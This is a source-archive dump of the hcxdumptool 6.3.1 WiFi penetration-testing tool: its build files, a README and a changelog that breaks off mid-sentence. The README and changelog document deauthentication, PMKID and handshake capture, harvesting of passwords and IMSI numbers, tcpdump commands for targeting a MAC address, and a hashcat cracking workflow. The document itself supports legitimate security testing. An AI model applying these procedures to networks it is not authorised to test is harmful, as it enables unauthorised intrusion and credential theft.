pax_global_header00006660000000000000000000000064144475216310014521gustar00rootroot0000000000000052 comment=29f3b0fa0937e564460269cf392838fa69d0d6e5 hcxdumptool-6.3.1/000077500000000000000000000000001444752163100140765ustar00rootroot00000000000000hcxdumptool-6.3.1/.gitignore000066400000000000000000000000141444752163100160610ustar00rootroot00000000000000hcxdumptool hcxdumptool-6.3.1/Android.mk000066400000000000000000000010411444752163100160030ustar00rootroot00000000000000LOCAL_PATH:=$(call my-dir) ifeq ($(PRODUCTION),1) VERSION_TAG := $(PRODUCTION_VERSION) else VERSION_TAG := $(shell git describe --tags || echo $(PRODUCTION_VERSION)) endif VERSION_YEAR := $(shell echo $(PRODUCTION_YEAR)) HCX_CFLAGS := -std=gnu99 -O3 -Wall -Wextra HCX_DEFS := -DVERSION_TAG=\"$(VERSION_TAG)\" -DVERSION_YEAR=\"$(VERSION_YEAR)\" HCX_DEFS += -DSTATUSOUT -DNMEAOUT include $(CLEAR_VARS) LOCAL_MODULE := hcxdumptool LOCAL_CFLAGS += $(HCX_CFLAGS) $(HCX_DEFS) LOCAL_SRC_FILES := hcxdumptool.c include $(BUILD_EXECUTABLE) hcxdumptool-6.3.1/AndroidManifest.xml000066400000000000000000000002411444752163100176640ustar00rootroot00000000000000 hcxdumptool-6.3.1/Makefile000066400000000000000000000025651444752163100155460ustar00rootroot00000000000000PRODUCTION := 1 PRODUCTION_VERSION := 6.3.1 PRODUCTION_YEAR := 2023 ifeq ($(PRODUCTION),1) VERSION_TAG := $(PRODUCTION_VERSION) else VERSION_TAG := $(shell git describe --tags || echo $(PRODUCTION_VERSION)) endif VERSION_YEAR := $(shell echo $(PRODUCTION_YEAR)) PREFIX ?= /usr BINDIR = $(DESTDIR)$(PREFIX)/bin HOSTOS := $(shell uname -s) CC ?= gcc CFLAGS ?= -O3 -Wall -Wextra CFLAGS += -std=gnu99 #CFLAGS += -ggdb -fsanitize=address DEFS = -DVERSION_TAG=\"$(VERSION_TAG)\" -DVERSION_YEAR=\"$(VERSION_YEAR)\" DEFS += -DSTATUSOUT -DNMEAOUT INSTALL ?= install INSTFLAGS = ifeq ($(HOSTOS), Linux) INSTFLAGS += -D endif TOOLS=hcxdumptool .PHONY: all build install clean uninstall all: build build: $(TOOLS) # $1: tool name define tool-build $(1)_src ?= $(1).c $(1)_libs ?= $(1)_cflags ?= $(1): $$($(1)_src) $$(CC) $$(CFLAGS) $$($(1)_cflags) $$(CPPFLAGS) -o $$@ $$($(1)_src) $$(DEFS) .deps/$(1).d: $(1) .PHONY: $(1).install $(1).install: $(1) $$(INSTALL) $$(INSTFLAGS) -m 0755 $(1) $$(BINDIR)/$(1) .PHONY: $(1).clean $(1).clean: rm -f .deps/$(1).d rm -f $(1) .PHONY: $(1).uninstall $(1).uninstall: rm -rf $$(BINDIR)/$(1) endef $(foreach tool,$(TOOLS),$(eval $(call tool-build,$(tool)))) install: $(patsubst %,%.install,$(TOOLS)) clean: $(patsubst %,%.clean,$(TOOLS)) rm -rf .deps rm -f *.o *~ uninstall: $(patsubst %,%.uninstall,$(TOOLS)) -include .deps/*.d hcxdumptool-6.3.1/README.md000066400000000000000000000276031444752163100153650ustar00rootroot00000000000000hcxdumptool ============== Small tool to capture packets from wlan devices and to discover potential weak points within own WiFi networks by running layer 2 attacks against WPA protocol (e.g.: PreSharedKey or PlainMasterKey is transmitted unencrypted by a CLIENT). Brief description -------------- Stand-alone binaries - designed to run on Arch Linux, but other Linux distributions should work, too. Capture format pcapng is compatible to Wireshark and tshark. Read this post: hcxtools - solution for capturing wlan traffic and conversion to hashcat formats (https://hashcat.net/forum/thread-6661.html) Read this post: New attack on WPA/WPA2 using PMKID (https://hashcat.net/forum/thread-7717.html) Read this post: Hash mode 22000 explained (https://hashcat.net/forum/thread-10253.html) Read this wiki: https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 Unsupported: Windows OS, macOS, Android, emulators or wrappers! What doesn't hcxdumptool do -------------- it does not crack WPA PSK related hashes (use hashat or JtR to recover the PSK) it does not crack WEP (use aircrack-ng instead) it does not crack WPS (use reaver or bully instead) it does not decrypt encrypted traffic (use Wireshark in parallel) it does not record entire traffic (use tshark or Wireshark in parallel) it does not perform Evil Twin attacks it is not a honey pot Detailed description -------------- | Tool | Description | | -------------- | ------------------------------------------------------------------------------------------------------ | | hcxdumptool | Tool to run several tests against WPA PSK to determine if ACCESS POINTs or CLIENTs are vulnerable | Work flow -------------- hcxdumptool -> hcxpcapngtool -> hcxhashtool (additional hcxpsktool/hcxeiutool) -> hashcat or JtR hcxdumptool: attack and capture everything (depending on options) hcxpcapngtool: convert everything hcxhashtool: filter hashes hcxpsktool: get weak PSK candidates hcxeiutool: calculate wordlists from ESSID hashcat or JtR: get PSK from hash Get source -------------- ``` git clone https://github.com/ZerBea/hcxdumptool.git cd hcxdumptool ``` Solve dependencies -------------- as mentioned in Requirements chapter Compile & install -------------- ``` make ``` install to `/usr/bin`: ``` make install (as super user) ``` or install to `/usr/local/bin`: ``` make install PREFIX=/usr/local (as super user) ``` On headless opearation remove -DSTATUSOUT from Makefile before compiling! The entire status display will not be compiled. That saves CPU cycles and prevent ERRORs. Or install via package manager -------------- ### Arch Linux [Arch Linux](https://www.archlinux.org/) `pacman -S hcxdumptool` ### Arch Linux ARM [Arch Linux ARM ](https://archlinuxarm.org/) `pacman -S hcxdumptool` ### Black Arch [Black Arch](https://blackarch.org/) is an Arch Linux-based penetration testing distribution for penetration testers and security researchers `pacman -S hcxdumptool` ### Debian (e.g. Kali, Ubuntu) release requirements >= bookworm (testing/Debian 12) To install use the following: `apt-get install make gcc` Compile for Android -------------- Install [Android NDK](https://developer.android.com/ndk/downloads) on your system and add it to `PATH`: ``` $ ndk-build --version GNU Make 4.3 Built for x86_64-pc-linux-gnu Copyright (C) 1988-2020 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. ``` Run `ndk-build` - built executables for some architectures will be created inside `libs` directory: ``` $ ndk-build [arm64-v8a] Compile : hcxdumptool <= hcxdumptool.c [arm64-v8a] Executable : hcxdumptool [arm64-v8a] Install : hcxdumptool => libs/arm64-v8a/hcxdumptool [armeabi-v7a] Compile thumb : hcxdumptool <= hcxdumptool.c [armeabi-v7a] Executable : hcxdumptool [armeabi-v7a] Install : hcxdumptool => libs/armeabi-v7a/hcxdumptool [x86] Compile : hcxdumptool <= hcxdumptool.c [x86] Executable : hcxdumptool [x86] Install : hcxdumptool => libs/x86/hcxdumptool [x86_64] Compile : hcxdumptool <= hcxdumptool.c [x86_64] Executable : hcxdumptool [x86_64] Install : hcxdumptool => libs/x86_64/hcxdumptool ``` Copy it to your phone and enjoy. Requirements -------------- * knowledge of radio technology * knowledge of electromagnetic-wave engineering * detailed knowledge of 802.11 protocol * detailed knowledge of key derivation functions * detailed knowledge of Linux * detailed knowledge of filter procedures (Berkeley Packet Filter, capture filter, display filter) * operating system: Linux (recommended: kernel >= 6.3, mandatory: kernel >= 5.10) * recommended: Arch Linux on notebooks and desktop systems, Arch Linux Arm on Raspberry Pi >= ARMv7 systems, Raspbian OS Lite or Debian on Raspberry Pi ARMv6 systems * chipset must be able to run in monitor mode. Recommended: MediaTek chipsets (due to active monitor mode capabilities) * driver must (mandatory) support monitor and full frame injection mode * gcc >= 12 recommended (deprecated versions are not supported: https://gcc.gnu.org/) * Raspberry Pi A, B, A+, B+, Zero (WH). (Recommended: Zero (WH) or A+, because of a very low power consumption), but notebooks and desktops will work, too. * GPIO hardware mod recommended (push button and LED) on Raspberry Pi * to allow 5/6GHz packet injection, it is mandatory to uncomment a regulatory domain that support this: /etc/conf.d/wireless-regdom If you decide to compile latest git head, make sure that your distribution is updated to latest version. Important notice: running Debian on arm it is mandatory to add "iomem=relaxed" to cmdline.txt to allow io memory mapping Adapters -------------- Driver must support (mandatory) monitor mode and full packet injection WIRELESS EXTENSIONS are deprecated and no longer supported Get information about VENDOR, model, chipset and driver here: https://wikidevi.wi-cat.ru/ Manufacturers do change chipsets without changing model numbers. Sometimes they add (v)ersion or (rev)vision. Preferred chipsets MediaTek due to active monitor mode feature Always verify the actual chipset with 'lsusb' and/or 'lspci'! No support for a third party driver which is not part of the official Linux kernel (https://www.kernel.org/)
Report related issues to the site, from which you downloaded the driver No support for a driver which doesn't support monitor mode and full frame injection natively
If you need these features, do a request on www.kernel.org No support for prism devices. Not recommended WiFi chipsets: * Broadcom (neither monitor mode nor frame injection by official Linux kernel) * Qualcomm (no frame injection by official Linux kernel) more information about possible issues or limitations: https://bugzilla.kernel.org https://wireless.wiki.kernel.org/en/users/Drivers/ath10k Antennas -------------- The best high frequency amplifier is a good antenna! It is much better to achieve gain using a good antenna instead of increasing transmitter power. | VENDOR MODEL | TYPE | | ---------------------- | --------------- | | LOGILINK WL0097 | grid parabolic | | TP-LINK TL-ANT2414 A/B | panel | | LevelOne WAN-1112 | panel | | DELOCK 88806 | panel | | TP-LINK TL-ANT2409 A | panel | GPS devices (NMEA 0183 protocol) -------------- | VENDOR MODEL | TYPE | | --------------------------- | --------------- | | NAVILOCK NL-701US | USB | | JENTRO BT-GPS-8 activepilot | BLUETOOTH | Useful scripts -------------- | Script | Description | | ------------ | -------------------------------------------------------- | | bash_profile | Autostart for Raspberry Pi (copy to /root/.bash_profile) | | pireadcard | Back up a Pi SD card | | piwritecard | Restore a Pi SD card | | stopnm | Example script to start NetworkManager | | startnm | Example script to stop NetworkManager | Hardware mod - see docs gpiowait.odg (hcxdumptool) -------------- LED flashes every 10 seconds if everything is fine and signals are received Press push button at least > 10 seconds until LED turns on (also LED turns on if hcxdumptool terminates) Raspberry Pi turned off and can be disconnected from power supply Hardware mod - see docs gpiowait.odg -------------- Press push button at least 10 seconds and Raspberry Pi turned off safely and can be disconnected from power supply Procedure -------------- first run hcxdumptool -L to get information about suitable interfaces run hcxdumptool [-i \] [--rcascan=p] to retrieve information about access points pcapng option codes (Section Header Block) -------------- ENTERPRISE NUMBER 0x2a, 0xce, 0x46, 0xa1 MAGIC NUMBER 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 OPTIONCODE_MACMYORIG 0xf29a (6 byte) OPTIONCODE_MACMYAP 0xf29b (6 byte) OPTIONCODE_RC 0xf29c (8 byte) OPTIONCODE_ANONCE 0xf29d (32 byte) OPTIONCODE_MACMYSTA 0xf29e (6 byte) OPTIONCODE_SNONCE 0xf29f (32 byte) OPTIONCODE_WEAKCANDIDATE 0xf2a0 (64 byte) == 63 characters + zero OPTIONCODE_GPS 0xf2a1 (max 128 byte) Warning -------------- hcxdumptool is designed to be an analysis tool. It should only be used in a 100% controlled environment(!). If you can't control the environment it is absolutely mandatory to set the BPF. Everything is requested/stored by default and unwanted information must be filtered out by option/filter or later on (offline)! You must use hcxdumptool only on networks you have permission to do this and if you know what you are doing, because: * hcxdumptool is able to prevent complete wlan traffic (depend on selected options) * hcxdumptool is able to capture PMKIDs from access points (only one single PMKID from an access point required) (use hcxpcapngtool to convert them to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture handshakes from not connected clients (only one single M2 from the client is required) (use hcxpcapngtool to convert them to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture handshakes from 5/6GHz clients on 2.4GHz (only one single M2 from the client is required) (use hcxpcapngtool to to a format hashcat and/Or JtR understand) * hcxdumptool is able to capture passwords from the wlan traffic (use hcxpcapngtool -R to save them to file, or together with networknames [-E]) * hcxdumptool is able to request and capture extended EAPOL (RADIUS, GSM-SIM, WPS) (hcxpcapngtool will show you information about them) * hcxdumptool is able to capture identities from the wlan traffic (for example: request IMSI numbers from mobile phones - use hcxpcapngtool -I to save them to file) * hcxdumptool is able to capture usernames from the wlan traffic (for example: user name of a server authentication - use hcxpcapngtool -U to save them to file) * Do not use a logical interface and leave the physical interface in managed mode * Do not use hcxdumptool in combination with aircrack-ng, reaver, bully or other tools which take access to the interface * Stop all services which take access to the physical interface (NetworkManager, wpa_supplicant,...) * Do not use tools like macchanger, as they are useless, because hcxdumptool uses its own random mac address space * Do not merge (pcapng) dumpfiles because that destroys custom block hash assignments hcxdumptool-6.3.1/changelog000066400000000000000000002643351444752163100157650ustar00rootroot0000000000000030.06.2023 ========== release v6.3.1 09.05.2023 ========== hcxdumptool: added option to remove active monitor flag -p : do not set monitor mode: active (do not ACK incoming frames addressed to the device MAC default monitor mode: active (ACK all incoming frames addresed to the device MAC) This is a workaround on mt7601u devices/drivers. Running active monitor mode, only frames addressed to the MAC of the device or addressed to BROADCAST MAC are received. This is a driver/firmware problem! To verify if you are affected: run hcxdumptool run Wireshark in parallel and set filter option to "eapol" if Wireshark only show EAPOL M1 frames it is mandatory to disable active monitor mode by option "-p" Problem is reported here: https://bugzilla.kernel.org/show_bug.cgi?id=217465 06.05.2023 ========== hcxdumptool: added option to save GPS information to pcapng dumpfile --nmea_pcapng : write GPS information to pcapng dump file 05.05.2023 ========== release v6.3.0 Since kernel 6.3 Kernel developer decided to print a dmesg warning if tools are detected that use deprecated WEXT: [ 2770.939021] warning: `hcxdumptool' uses wireless extensions which will stop working for Wi-Fi 7 hardware; use nl80211 hcxdumptool used ioctl(SIOCGIWNAME) to detect presence of WEXT. That was the last remnant of WEXT code. To get rid of this dmesg warning, this detection has been removed by latest commit. 03.05.2023 ========== hcxdumptool: changed/added several options: $ hcxdumptool --help hcxdumptool 6.2.9-161-gf581815 (C) 2023 ZeroBeat usage: hcxdumptool first stop all services that take access to the interface, e.g.: $ sudo systemctl stop NetworkManager.service $ sudo systemctl stop wpa_supplicant.service then run hcxdumptool press ctrl+c to terminate press GPIO button to terminate hardware modification is necessary, read more: https://github.com/ZerBea/hcxdumptool/tree/master/docs stop all services (e.g.: wpa_supplicant.service, NetworkManager.service) that take access to the interface do not set monitor mode by third party tools (iwconfig, iw, airmon-ng) do not use logical (NETLINK) interfaces (monx, wlanxmon, prismx, ...) created by airmon-ng and iw do not use virtual machines or emulators do not run other tools that take access to the interface in parallel (except: tshark, wireshark, tcpdump) do not use tools to change MAC (like macchanger) do not merge (pcapng) dump files, because this destroys assigned hash values! short options: -i : name of INTERFACE to be used default: first suitable INTERFACE warning: hcxdumptool changes the virtual MAC address of the INTERFACE -w : write packets to a pcapng-format file named default outfile name: yyyyddmmhhmmss-interfacename.pcapng get more information: https://pcapng.com/ -c : set channel (1a,2a,36b...) default: 1a,6a,11a important notice: channel numbers are not unique it is mandatory to add band information to the channel number (e.g. 12a) band a: NL80211_BAND_2GHZ band b: NL80211_BAND_5GHZ band c: NL80211_BAND_6GHZ band d: NL80211_BAND_60GHZ band e: NL80211_BAND_S1GHZ (902 MHz) to disable frequency management, set this option to a single frequency/channel -f : set frequency (2412,2417,5180,...) -F : use available frequencies from INTERFACE -t : minimum stay time (will increase on new stations and/or authentications) default 1 seconds -m : set monitor mode and terminate -L : show INTERFACE list -I : show detailed information about INTERFACE -h : show this help -v : show version long options: --bpf= : input kernel space Berkeley Packet Filter (BPF) code steps to create a BPF (it only has to be done once): $ hcxdumptool -m create BPF to protect MACs $ tcpdump -i not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf recommended to protect own devices create BPF to attack a MAC $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 -ddd > attack.bpf it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req) $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf see man pcap-filter for a list of all filter options add BPF code: $ hcxdumptool -i --bpf=attack.bpf ... --disable_beacon : do not transmit BEACON frames --disable_deauthentication : do not transmit DEAUTHENTICATION/DISASSOCIATION frames --disable_proberequest : do not transmit PROBEREQUEST frames --disable_association : do not AUTHENTICATE/ASSOCIATE --disable_reassociation : do not REASSOCIATE a CLIENT --beacontx= : transmit BEACON of first n entries of ESSID list default: 10 --proberesponsetx= : transmit PROBERESPONSEs of first n entries of ESSID list default: 10 --essidlist= : initialize ESSID list with these ESSIDs --errormax= : set maximum allowed ERRORs default: 100 ERRORs --watchdogmax= : set maximum TIMEOUT when no packets received default: 600 seconds --attemptclientmax= : set maximum of attempts to request an EAPOL M2 default: 10 attempts --attemptapmax= : set maximum of received BEACONs to request a PMKID or to get a 4-way handshake default: stop after 4 received BEACONs --tot= : enable timeout timer in minutes --onsigterm= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --ongpiobutton= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --ontot= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --onwatchdog= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --onerror= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) push GPIO button (> 10 seconds) to terminate program default: 0 (GPIO not in use) --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default: 0 (GPIO not in use) --nmea_dev= : open NMEA device (/dev/ttyACM0, /dev/tty/USB0, ...) baudrate = BD9600 --gpsd : use gpsd to get position gpsd will be switched to NMEA0183 mode --nmea_out= : write GPS information to a nmea-format file named default outfile name: yyyymmddhhmmss.nmea output: NMEA 0183 standard messages: $GPRMC: Position, velocity, time and date $GPGGA: Position, orthometric height, fix related data, time $GPWPL: Position and MAC AP $GPTXT: ESSID in HEX ASCII use gpsbabel to convert to other formats: gpsbabel -w -t -i nmea -f in_file.nmea -o gpx -F out_file.gpx gpsbabel -w -t -i nmea -f in_file.nmea -o kml -F out_file.kml get more information: https://en.wikipedia.org/wiki/NMEA_0183 --rcascan= : do (R)adio (C)hannel (A)ssignment scan default = passive scan a = active scan p = passive scan --rds= : sort real time display default: sort by time (last seen on top) 1 = sort by status (last PMKID/EAPOL on top) --help : show this help --version : show version Legend real time display: R = + AP display: AP is in TX range or under attack S = + AP display: AUTHENTICATION KEY MANAGEMENT PSK P = + AP display: got PMKID 1 = + AP display: got EAPOL M1 (CHALLENGE) 3 = + AP display: got EAPOL M1M2M3 (AUTHORIZATION) E = + CLIENT display: got EAP-START MESSAGE 2 = + CLIENT display: got EAPOL M1M2 (ROGUE CHALLENGE) Notice: This is a penetration testing tool! It is made to detect vulnerabilities in your NETWORK mercilessly! To store entire traffic, run -w allframes.pcapng> in parallel 19.04.2023 ========== hcxdumptool: changed rcascan --rcascan= : do (R)adio (C)hannel (A)ssignment scan default = passive scan a = active scan p = passive scan 14.04.2023 ========== hcxdumptool: added new option to sort status display --rds= : sort real time display default: sort by time (last seen on top) 1 = sort by status (last PMKID/EAPOL on top) 07.04.2023 ========== removed obsolete hcxpioff refactored hcxdumptool: replaced entire hcxdumptool code by hcxlabtool code $ hcxdumptool --help hcxdumptool 6.2.9-22-gace924f (C) 2023 ZeroBeat usage: hcxdumptool first stop all services that take access to the interface , e.g.: $ sudo systemctl stop NetworkManager.service $ sudo systemctl stop wpa_supplicant.service than run hcxdumptool press ctrl+c to terminate press GPIO button to terminate hardware modification is necessary, read more: https://github.com/ZerBea/hcxdumptool/tree/master/docs do not set monitor mode by third party tools (iwconfig, iw, airmon-ng) do not use logical (NETLINK) interfaces (monx, wlanxmon, prismx, ...) created by airmon-ng and iw do not use virtual machines or emulators do not run other tools that take access to the interface in parallel (except: tshark, wireshark, tcpdump) do not use tools to change MAC (like macchanger) stop all services (e.g.: wpa_supplicant.service, NetworkManager.service) that take access to the interface short options: -i : name of INTERFACE to be used default: first suitable INTERFACE warning: hcxdumptool changes the virtual MAC address of the INTERFACE -w : write packets to a pcapng-format file named default outfile name: yyyyddmmhhmmss-interfacename.pcapng get more information: https://pcapng.com/ -c : set channel (1a,2a,36b...) default: 1a,6a,11a important notice: channel numbers are not unique it is mandatory to add band information to the channel number (e.g. 12a) band a: NL80211_BAND_2GHZ band b: NL80211_BAND_5GHZ band c: NL80211_BAND_6GHZ band d: NL80211_BAND_60GHZ band e: NL80211_BAND_S1GHZ (902 MHz) to disable frequency management, set this option to a single frequency/channel -f : set frequency (2412,2417,5180,...) -F : use available frequencies from INTERFACE -t : minimum stay time (will increase on new stations and/or authentications default 1 seconds -m : set monitor mode and terminate -L : show INTERFACE list -I : show detailed information about INTERFACE -h : show this help -v : show version long options: --bpf= : input kernel space Berkeley Packet Filter (BPF) code steps to create a BPF (it only has to be done once): $ hcxdumptool -m create BPF to protect MACs $ tcpdump -i not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf recommended to protect own devices create BPF to attack a MAC $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 -ddd > attack.bpf it is strongly recommended to allow all PROBEREQUEST frames (wlan_type mgt && wlan_subtype probe-req) $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 or wlan addr3 11:22:33:44:55:66 or wlan addr3 ff:ff:ff:ff:ff:ff -ddd > attack.bpf see man pcap-filter for a list of all filter options add BPF code: $ hcxdumptool -i --bpf=attack.bpf ... --disable_beacon : do not transmit BEACON frames --disable_deauthentication : do not transmit DEAUTHENTICATION/DISASSOCIATION frames --disable_proberequest : do not transmit PROBEREQUEST frames --disable_association : do not AUTHENTICATE/ASSOCIATE --disable_reassociation : do not REASSOCIATE a CLIENT --beacontx= : transmit BEACON of first n entries of ESSID list default: 10 --proberesponsetx= : transmit PROBERESPONSEs of first n entries of ESSID list default: 10 --essidlist= : initialize ESSID list with this ESSIDs --errormax= : set maximum allowed ERRORs default: 100 ERRORs --watchdog= : set maximum TIMOUT when no packets received default: 600 seconds --attemptclientmax= : set maximum of attempts to request an EAPOL M2 default: 10 attempts --attemptapmax= : set maximum of received BEACONs to request a PMKID or to get a 4-way handshake default: stop after 4 received BEACONs --tot= : enable timeout timer in minutes --onsigterm= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --ongpiobutton= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --ongtot= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --onwatchdog= : action when the program has been terminated (poweroff, reboot) poweroff: power off system reboot: reboot system --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) push GIPO button (> 10 seconds) to terminate program default: 0 (GPIO not in use) --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default: 0 (GPIO not in use) --nmea_dev= : open NMEA device (/dev/ttyACM0, /dev/tty/USB0, ...) baudrate = BD9600 --gpsd : use gpsd to get position gpsd will be switched to NMEA0183 mode --nmea_out= : write GPS information to a nmea-format file named default outfile name: yyyyddmmhhmmss.nmea output: NMEA 0183 standard messages: $GPRMC: Position, velocity, time and date $GPGGA: Position, orthometric height, fix related data, time $GPWPL: Position and MAC AP $GPTXT: ESSID in HEX ASCII use gpsbabel to convert to other formats: gpsbabel -w -t -i nmea -f in_file.nmea -o gpx -F out_file_gpx gpsbabel -w -t -i nmea -f in_file.nmea -o kml -F out_file.kml get more information: https://en.wikipedia.org/wiki/NMEA_0183 --rcascan_passive : do passive (R)adio (C)hannel (A)ssignment scan --help : show this help --version : show version Legend real time display: R = + AP is in TX range P = + got PMKID M = + AP display: got EAPOL M1M2M3 (AUTHORIZATION) M = + CLIENT display: got EAPOL M1M2 (ROGUE CHALLENGE) A = + AUTHENTICATION KEY MANAGEMENT PSK Notice: This is a penetration testing tool! It is made to detect vulnerabilities in your NETWORK mercilessly! To store entire traffic, run -w allframes.pcapng> in parallel 06.04.2023 ========== release v6.2.9 several bug fixes This is the last version: that use WIRELESS EXTENSIONS that use ETHTOOL to get/set virtual MAC address that use old style status output that use soft coded filter lists that use msec timestamp that use crypto stuff that use server/client mode to display status Next version will go back to the roots: set focus on WPA PSK (WPA1, WPA2, WPA2 key version 3) set bandwidth to 20MHz to increase range set bitrate to lowest values to increase range use active monitor mode use NL80211 stack use RTNETLINK band a, b, c, d, e support use NMEA messages: $GPRMC: Position, velocity, time and date $GPGGA: Position, orthometric height, fix related data, time $GPWPL: Position and MAC AP $GPTXT: ESSID in HEX ASCII remove options that slow hcxdumptool down 10.03.2023 ========== release v6.2.8 move to OpenSSL 3.0 EVP API (from now on OPenSSL >= 3.0 is mandatory) new options several bug fixes 16.01.2023 ========== hcxdumptool: added option to reset an USB device without unplugging it --reset_usb_device=: reset USB device by BUS ID and device ID (/dev/bus/usb/bus_id/device_id $ lsusb Bus 005 Device 006: ID 7392:7710 Edimax Technology Co., Ltd Edimax Wi-Fi sysfs dev path = /dev/bus/usb/005/006 12.11.2022 ========== start moving to OpenSSL 3.0 EVP API this is a huge step forward an will break backward compatibility https://wiki.openssl.org/index.php/OpenSSL_3.0 07.08.2022 ========== release v6.2.7 several bug fixes still using OpenSSL 1.1 02.06.2022 ========== hcxdumptool: added warning if a not recommended driver has been detected 31.05.2022 ========== hcxpcapngtool: added new option according to https://github.com/ZerBea/hcxdumptool/issues/220 --passive : channel management is completely disabled - initial channel must be set by a third party tool hcxdumptool is acting like a passive dumper (silent mode) expect possible heavy packet loss 22.04.2022 ========== release v6.2.6 several bug fixes license update still supporting OpenSSL 1.1 01.12.2021 ========== release v6.2.5 still supporting OpenSSL 1.1 08.11.2021 ========== hcxdumptool: replaced channel scan engine by frequency scan engine this is high experimental tested devices: USB: Bus 005 Device 060: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter Bus 005 Device 062: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter Bus 005 Device 064: ID 148f:5572 Ralink Technology, Corp. RT5572 Wireless Adapter Bus 005 Device 065: ID 0e8d:7612 MediaTek Inc. MT7612U 802.11a/b/g/n/ac Wireless Adapter Bus 005 Device 066: ID 0cf3:9271 Qualcomm Atheros Communications AR9271 802.11n Bus 005 Device 068: ID 0bda:8178 Realtek Semiconductor Corp. RTL8192CU 802.11n WLAN Adapter Bus 005 Device 071: ID 7392:7710 Edimax Technology Co., Ltd Edimax Wi-Fi Bus 005 Device 073: ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter Bus 005 Device 075: ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter Bus 005 Device 078: ID 0b05:17d1 ASUSTek Computer, Inc. AC51 802.11a/b/g/n/ac Wireless Adapter [Mediatek MT7610U] Bus 005 Device 082: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter PCI: 04:00.0 Network controller: Realtek Semiconductor Co., Ltd. RTL8821CE 802.11ac PCIe Wireless Network Adapter That is neccessary because, since WiFi 6, channel numbers are no longer unique: https://en.wikipedia.org/wiki/List_of_WLAN_channels 24.10.2021 ========== hcxdumptool: added new option to ignore ioctl() warnings --force_interface : ignore all ioctl() warnings do not report issues, if attacks or channel switch is not working as expected 23.10.2021 ========== added generic hcxdumptool.1 man page 22.10.2021 ========== moved install dir from usr/local/bin to /usr/bin 14.09.2021 ========== release v6.2.4 This is the last version, supporting OpenSSL 1.1 Next version 6.3.0 will need OpenSSL 3.0.0 01.09.2021 ========== hcxdumptool: added new option to the next EAP request entry contained in the sequence passed to --eapreq with a type matching the Desired Auth Type requested in a client's Legacy NAK response --eapreq_follownak : jump to Auth Type requested by client in Legacy Nak response, if type available in remaining request sequence 29.08.2021 ========== hcxdumptool: GPIO flash intervall not longer hardcoded --gpio_statusled_intervall= : Raspberry Pi GPIO LED flash intervall default = flash every 5 seconds 15.08.2021 ========== hcxdumptool: allow MAC instead of filter list --filterlist_ap= : ACCESS POINT MAC or MAC filter list format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client= : CLIENT MAC or MAC filter list format: 112233445566, 11:22:33:44:55:66, 11-22-33-44-55-66 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! 17.05.2021 ========== release v 6.1.6 get ready for gcc 11.1.0 18.03.2021 ========== hcxdumptool: added VENDOR filter --filterlist_ap_vendor= : ACCESS POINT MAC filter list by VENDOR format: 112233, 11:22:33, 11-22-33 # comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client_VENDOR= : CLIENT MAC filter list format: 112233, 11:22:33, 11-22-33 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! 09.03.2021 ========== release v 6.1.6 get ready for OpenSSL 3.0 05.03.2021 ========== hcxdumptool: removed preamble option, because it is ignored by most wlan adapters 04.03.2021 ========== hcxdumptool: added new option to use short preamble --short_preamble : use short preamble default: use long preamble that may not work on older devices! 23.02.2021 ========== hcxdumptool: allow output to stdout -o : output file in pcapng format, filename '-' outputs to stdout including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) 14.02.2021 ========== sll_pkttype = PACKET_OUTGOING is completey ingnored in promiscuous mode At least I found a way to detect outgoing packets. Luckily IEEE80211_RADIOTAP_TX_FLAGS is set on outgoing packets. If we check this, we are able to ignore them. That save us CPU time. 13.02.2021 ========== hcxdumptool: added WATCHDOG - we need that to determine if USB device died Raspberry Pi LED will flash twice if now packet received turing the last past 600 seconds print AGE of last received packet in status 09.02.2021 ========== started to prepare to use openssl 3.0 Many structures have been made opaque in OpenSSL 3.0 since OpenSSL 1.0.2 https://wiki.openssl.org/index.php/OpenSSL_3.0 it is recommended to upgrade to at least 